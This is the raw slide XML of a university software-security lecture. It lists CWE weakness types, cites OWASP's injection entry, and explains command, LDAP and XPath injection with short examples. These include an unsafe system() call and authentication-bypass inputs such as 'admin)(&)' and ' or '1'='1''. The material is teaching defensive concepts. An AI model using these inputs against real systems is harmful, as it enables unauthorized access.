              <a:t>8. Integer Overflow  	                                                                    9. CSRF                                                                                                       10. Path Traversal                                                                                        11. OS Command Injection                                                       12. Out-of-bounds Write                                                       13. Improper Authentication                                                   14. NULL Pointer Dereference                                                                15. Incorrect Permission Assignment                                                               16. Unrestricted Upload of File with Dangerous Type                                                                  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="907" dirty="0" smtClean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en-US" altLang="en-US" sz="907" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>17. Improper Restriction of XML External Entity                                                                          18. Code Injection	                                                         19. Use of Hard-coded Credentials                                                    20. Uncontrolled Resource Consumption                                    21. Missing Release of Resource                                                      22. Untrusted Search Path                                                                                    23. Deserialization of Untrusted Data                                                  24. Improper Privilege Management	                                          25. Improper Certificate Validation</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="907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Radboud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> University Nijmegen</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22535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3BE4A2F-19BB-4EBD-9203-4F428991FA2C}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0">
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-NL" smtClean="0">
              <a:cs typeface="DejaVu Sans" charset="0"/>
            </a:endParaRPr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 bwMode="auto">
          <a:xfrm>
            <a:off x="6315974" y="1148041"/>
            <a:ext cx="1874774" cy="48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742950" indent="-28575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kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CWE TOP 668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190822"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6761601" y="1631881"/>
          <a:ext cx="983520" cy="5716512"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="164160">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4200381073"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="819360">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="23723131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Compiler Removal of Code to Clear Buffers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20544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CWE-20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Input Validation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81988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CWE-22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Limitation of a Pathname to a Restricted Directory ('Path Traversal')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32431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CWE-23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Relative Path Traversal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93453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CWE-24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'../filedir'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77735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CWE-25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'/../filedir'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810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CWE-26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'/dir/../filename'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36889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CWE-27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'dir/../../filename'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70009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CWE-28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'..\filedir'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3704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CWE-29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'\..\filename'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86183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CWE-30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'\dir\..\filename'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04513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CWE-31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'dir\..\..\filename'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931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CWE-32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'...' (Triple Dot)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28966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CWE-33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'....' (Multiple Dot)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64713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CWE-34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'....//'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34056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CWE-35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'.../...//'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26696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CWE-36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Absolute Path Traversal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64283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CWE-37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'/absolute/pathname/here'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41569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CWE-38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'\absolute\pathname\here'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72347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CWE-39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'C:dirname'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93629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CWE-40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Traversal: '\\UNC\share\name\' (Windows UNC Share)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30632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CWE-41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Resolution of Path Equivalence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61991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CWE-51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Equivalence: '/multiple//internal/slash'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0320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CWE-55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Equivalence: '/./' (Single Dot Directory)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19091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CWE-57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Path Equivalence: 'fakedir/../realdir/filename'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71380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CWE-59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Link Resolution Before File Access ('Link Following')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81795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CWE-61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UNIX Symbolic Link (Symlink) Following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63717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CWE-62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UNIX Hard Link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68925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CWE-73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External Control of File Name or Path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892807"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="3168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Special Elements in Output Used by a Downstream Component('Injection')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02221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CWE-75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Failure to Sanitize Special Elements into a Different Plane (Special Element Injection)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2382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CWE-76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Equivalent Special Elements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62600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CWE-77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Special Elements used in a Command ('Command Injection')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087849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CWE-78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Special Elements used in an OS Command ('OS CommandInjection')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672785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CWE-79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Input During Web Page Generation ('Cross-site Scripting')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55948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CWE-88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Argument Injection or Modification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192741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CWE-89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Special Elements used in an SQL Command ('SQL Injection')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522919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CWE-90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Special Elements used in an LDAP Query ('LDAP Injection')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09748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CWE-91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XML Injection (aka Blind XPath Injection)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79649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CWE-93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CRLF Sequences ('CRLF Injection')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73035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Control of Generation of Code ('Code Injection')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954597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CWE-95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Directives in Dynamically Evaluated Code ('Eval Injection')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79363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CWE-96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Directives in Statically Saved Code ('Static Code Injection')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6159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CWE-97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Server-Side Includes (SSI) Within a Web Page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94335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CWE-99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Control of Resource Identifiers ('Resource Injection')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17608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CWE-114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Process Control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62773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CWE-116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Encoding or Escaping of Output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20908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CWE-117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Output Neutralization for Logs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77455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CWE-123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Write-what-where Condition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04289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CWE-134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Use of Externally-Controlled Format String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35684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CWE-135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Incorrect Calculation of Multi-Byte String Length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91167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CWE-138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Special Elements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88626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CWE-140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Delimiters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69431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CWE-141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Parameter/Argument Delimiters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346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CWE-142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Value Delimiters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82660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CWE-143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Record Delimiters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8362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CWE-144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Line Delimiters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86303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CWE-145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Section Delimiters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74205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CWE-146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Expression/Command Delimiters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60991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CWE-147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Input Terminators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23552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CWE-148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Input Leaders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26066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CWE-149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Quoting Syntax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45661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CWE-150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Escape, Meta, or Control Sequences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5906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CWE-151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Comment Delimiters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97859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CWE-152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Macro Symbols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65332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CWE-153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Substitution Characters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18164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CWE-154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Variable Name Delimiters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76984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CWE-155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Wildcards or Matching Symbols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65189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CWE-156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Whitespace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83322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CWE-157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Failure to Sanitize Paired Delimiters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47391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CWE-158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Null Byte or NUL Character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51354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CWE-159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Failure to Sanitize Special Element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75419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CWE-160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Leading Special Elements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02428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CWE-161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Multiple Leading Special Elements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3684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CWE-162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Trailing Special Elements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0924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CWE-163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Multiple Trailing Special Elements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42372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CWE-164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Internal Special Elements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75881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CWE-165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Multiple Internal Special Elements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67079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CWE-166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Handling of Missing Special Element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72440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CWE-167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Handling of Additional Special Element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23752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CWE-168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Handling of Inconsistent Special Elements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37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CWE-172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Encoding Error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18710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CWE-173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Handling of Alternate Encoding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27979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CWE-174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Double Decoding of the Same Data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18912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CWE-175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Handling of Mixed Encoding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58803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CWE-176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Handling of Unicode Encoding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41505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CWE-177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Handling of URL Encoding (Hex Encoding)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23959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CWE-178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Handling of Case Sensitivity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53098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CWE-179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Incorrect Behavior Order: Early Validation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89454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CWE-180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Incorrect Behavior Order: Validate Before Canonicalize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1111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CWE-181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Incorrect Behavior Order: Validate Before Filter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85630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CWE-182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Collapse of Data into Unsafe Value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573649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CWE-184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Incomplete Blacklist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24672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CWE-185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Incorrect Regular Expression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4482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CWE-186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Overly Restrictive Regular Expression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99814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CWE-187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Partial Comparison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837799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CWE-188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Reliance on Data/Memory Layout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4773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CWE-200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Information Exposure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41587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CWE-201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Information Exposure Through Sent Data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14269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CWE-203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Information Exposure Through Discrepancy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45536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CWE-204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Response Discrepancy Information Exposure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80680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CWE-209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Information Exposure Through an Error Message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83979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CWE-210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Information Exposure Through Self-generated Error Message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06202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CWE-211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Information Exposure Through Externally-generated Error Message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72172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CWE-212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Cross-boundary Removal of Sensitive Data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94102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CWE-215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Information Exposure Through Debug Information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13132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CWE-216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Containment Errors (Container Errors)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240469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CWE-227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Fulfillment of API Contract ('API Abuse')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55752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CWE-241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Handling of Unexpected Data Type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48396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CWE-252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Unchecked Return Value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75676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CWE-253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Incorrect Check of Function Return Value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737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CWE-273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Check for Dropped Privileges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25784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CWE-311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Missing Encryption of Sensitive Data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01394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CWE-319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Cleartext Transmission of Sensitive Information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5198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CWE-354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Validation of Integrity Check Value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207833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CWE-364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Signal Handler Race Condition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782418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CWE-365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Race Condition in Switch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32836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CWE-374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Passing Mutable Objects to an Untrusted Method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83812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CWE-375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Returning a Mutable Object to an Untrusted Caller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69873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CWE-378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Creation of Temporary File With Insecure Permissions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4367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CWE-379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Creation of Temporary File in Directory with Incorrect Permissions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07029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CWE-390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Detection of Error Condition Without Action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301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CWE-391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Unchecked Error Condition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0842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CWE-394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Unexpected Status Code or Return Value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922641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CWE-405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Asymmetric Resource Consumption (Amplification)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16725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CWE-406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Insufficient Control of Network Message Volume (Network Amplification)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633235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CWE-407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Algorithmic Complexity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71231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CWE-408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Incorrect Behavior Order: Early Amplification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95696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CWE-409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Handling of Highly Compressed Data (Data Amplification)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6877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CWE-410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Insufficient Resource Pool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183671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CWE-412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Unrestricted Externally Accessible Lock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684586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CWE-413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Resource Locking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0490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CWE-414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Missing Lock Check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81814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CWE-430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Deployment of Wrong Handler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98592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CWE-431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Missing Handler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31726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CWE-432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Dangerous Signal Handler not Disabled During Sensitive Operations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944128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CWE-447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Unimplemented or Unsupported Feature in UI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3434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CWE-453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Insecure Default Variable Initialization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93775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CWE-454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External Initialization of Trusted Variables or Data Stores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72077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CWE-455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Non-exit on Failed Initialization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27958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CWE-456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Missing Initialization of a Variable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57425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CWE-460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Cleanup on Thrown Exception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35634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CWE-462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Duplicate Key in Associative List (Alist)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16856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CWE-463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Deletion of Data Structure Sentinel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79590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CWE-464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Addition of Data Structure Sentinel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29451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CWE-470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Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection')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93927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CWE-472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External Control of Assumed-Immutable Web Parameter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813863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CWE-474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Use of Function with Inconsistent Implementations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77802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CWE-479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Signal Handler Use of a Non-reentrant Function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370633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CWE-488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Exposure of Data Element to Wrong Session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965752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CWE-489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Leftover Debug Code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318656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CWE-493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Critical Public Variable Without Final Modifier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11004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CWE-494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Download of Code Without Integrity Check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86606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CWE-496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Public Data Assigned to Private Array-Typed Field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92435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CWE-497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Exposure of System Data to an Unauthorized Control Sphere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721933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CWE-498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Cloneable Class Containing Sensitive Information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771828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CWE-500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Public Static Field Not Marked Final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908745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CWE-502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Deserialization of Untrusted Data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15802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CWE-506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Embedded Malicious Code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640722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CWE-507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Trojan Horse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24416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CWE-508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Non-Replicating Malicious Code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58148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CWE-509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Replicating Malicious Code (Virus or Worm)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4415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CWE-510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Trapdoor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249243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CWE-511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Logic/Time Bomb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190259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CWE-512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Spyware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315633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CWE-524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Information Exposure Through Caching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59024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CWE-526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Information Exposure Through Environmental Variables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91442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CWE-538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File and Directory Information Exposure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900500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CWE-539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Information Exposure Through Persistent Cookies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034937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CWE-543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Use of Singleton Pattern Without Synchronization in a Multithreaded Context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34293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CWE-544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Missing Standardized Error Handling Mechanism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804612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CWE-546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Suspicious Comment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154189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CWE-548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Information Exposure Through Directory Listing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80268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CWE-584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Return Inside Finally Block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83863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CWE-587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Assignment of a Fixed Address to a Pointer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14321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CWE-591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Sensitive Data Storage in Improperly Locked Memory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30363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CWE-595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Comparison of Object References Instead of Object Contents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28203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CWE-598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Information Exposure Through Query Strings in GET Request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64114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CWE-605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Multiple Binds to the Same Port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559713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CWE-622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Validation of Function Hook Arguments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704388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CWE-636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Not Failing Securely ('Failing Open')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970555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CWE-637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Unnecessary Complexity in Protection Mechanism (Not Using 'Economy of Mechanism')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76538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CWE-638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Not Using Complete Mediation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83525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CWE-641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Restriction of Names for Files and Other Resources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59518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CWE-643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Data within XPath Expressions ('XPath Injection')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83928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CWE-652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Data within XQuery Expressions ('XQuery Injection')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3385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CWE-663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Use of a Non-reentrant Function in a Concurrent Context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68460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CWE-664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Control of a Resource Through its Lifetime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145828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CWE-666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Operation on Resource in Wrong Phase of Lifetime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363840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CWE-674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Uncontrolled Recursion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19923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CWE-688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Function Call With Incorrect Variable or Reference as Argument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97364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CWE-694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Use of Multiple Resources with Duplicate Identifier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81691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CWE-754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Check for Unusual or Exceptional Conditions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05674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CWE-759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Use of a One-Way Hash without a Salt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24994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CWE-761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Free of Pointer not at Start of Buffer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263300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CWE-765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Multiple Unlocks of a Critical Resource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11799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CWE-767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Access to Critical Private Variable via Public Method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351407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CWE-773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Missing Reference to Active File Descriptor or Handle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42553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CWE-774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Allocation of File Descriptors or Handles Without Limits or Throttling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9782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CWE-777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Regular Expression without Anchors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45417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CWE-785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Use of Path Manipulation Function without Maximum-sized Buffer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75135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CWE-789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Uncontrolled Memory Allocation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63842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CWE-806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Buffer Access Using Size of Source Buffer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849191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CWE-828 ◄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Signal Handler with Functionality that is not Asynchronous-Safe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09804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CWE-909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Missing Initialization of Resource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31705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CWE-912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Hidden Functionality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91320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CWE-913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Control of Dynamically-Managed Code Resources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42836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CWE-914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Control of Dynamically-Identified Variables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7664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CWE-915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Improperly Controlled Modification of Dynamically-Determined Object Attributes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312415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CWE-916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Use of Password Hash With Insufficient Computational Effort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018260"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="2736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CWE-940 ☉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Verification of Source of a Communication Channel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62219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CWE-943</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="1417" marR="1417" marT="708" marB="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6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16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16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16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16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DejaVu Sans" charset="0"/>
                        </a:rPr>
                        <a:t>Improper Neutralization of Special Elements in Data Query Logic</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="1417" marR="1417" marT="708" marB="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85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1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Injection Attacks : no. 1 in Top </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Ten</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>https://www.owasp.org/index.php/Top_10-2017_A1-Injection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29600" cy="4328223"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14587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problems seen so far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>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>memory corruption </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>(incl. buffer overflow)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>integer overflow </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>possibly to create buffer overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>format string attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OS command injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t> -  in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>PREfast</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t> example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> execute([</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SA_Pre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(Tainted=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SA_No</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)]char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-U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system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>); // pass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> as command to be executed by the OS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>data races </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>– in lecture on Safety</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-285750"/>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>There are many more…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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0840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OWASP Top 10 -  Risk Rating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83661"/>
            <a:ext cx="6143625" cy="24955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4" y="1055647"/>
            <a:ext cx="7430144" cy="25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LDAP injection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/>
              <a:t>An LDAP query sent to the LDAP server to authenticate a user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> 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(&amp;(USER=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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jan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)(PASSWD=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abcd1234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))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can be corrupted by giving as username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admin)(&amp;)  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>which results in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(&amp;(USER=name)(&amp;))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(PASSWD=</a:t>
            </a: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pwd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cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>where only first part is used, and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(&amp;) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>is LDAP notation for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TRUE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cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>There are also blind LDAP injection attacks.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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fld id="{AF2AEC77-7434-46CA-BE34-C63E21E2B0B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 smtClean="0"/>
              <a:t>XPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2400" dirty="0" smtClean="0"/>
              <a:t> in XML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accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XML data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>, eg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nl-N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student_database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&lt;student&gt;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&lt;username&gt;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jan&lt;/username&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-N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&gt;abcd1234&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-N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&lt;/student&gt;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&lt;student&gt;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&lt;username&gt;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kees&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-N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nameuser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nl-N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&gt;geheim&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-N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&lt;student&gt;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&lt;/student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_database&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>can be accessed by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XPath queries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>eg</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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(//student[username/text()='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="16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 and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GB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/text()='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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abcd123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']/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account/text()) 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_database&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>which</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>corrupted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>such</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> as </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     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 or '1'='1'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7366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 smtClean="0"/>
              <a:t>More obscure example: SSI Injection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nl-NL" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server-Side </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Includes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (SSI) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>are </a:t>
            </a:r>
            <a:r>
